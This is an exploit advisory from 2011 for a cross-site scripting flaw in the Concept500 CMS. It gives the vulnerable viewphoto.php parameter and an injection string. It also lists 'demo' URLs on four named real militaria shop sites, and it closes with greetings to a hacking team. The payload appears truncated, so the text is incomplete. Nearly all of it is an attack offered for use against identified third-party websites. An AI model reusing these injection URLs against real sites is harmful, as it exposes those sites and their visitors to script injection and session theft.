# Exploit Title: Concept500 CMS XSS Vulnerability # Date: 2011-08-11 # Author: Sepehr Security Team # Software Site: http://www.concept500.co.uk/ ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+ #Exploit: http://<=- Domain -=>/shop/viewphoto.php?shoph=id[XSS]&phqu=id #XSS: "> #Demo: http://www.clementsmilitaria.com/shop/viewphoto.php?shoph=50293">&phqu=4 http://www.dbmilitaria.co.uk/shop/viewphoto.php?shoph=10242"> &phqu=2 http://www.dhbmilitaria.com/shop/viewphoto.php?shoph=50084"> &phqu=0 http://www.dorsetmilitaria.com/shop/viewphoto.php?shoph=50680"> &phqu=5 ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+ #Spc Tanx to All Sepehr Sceurity Team Members And All Iranian Hack3rs #wWw.Sepehr-Team.orG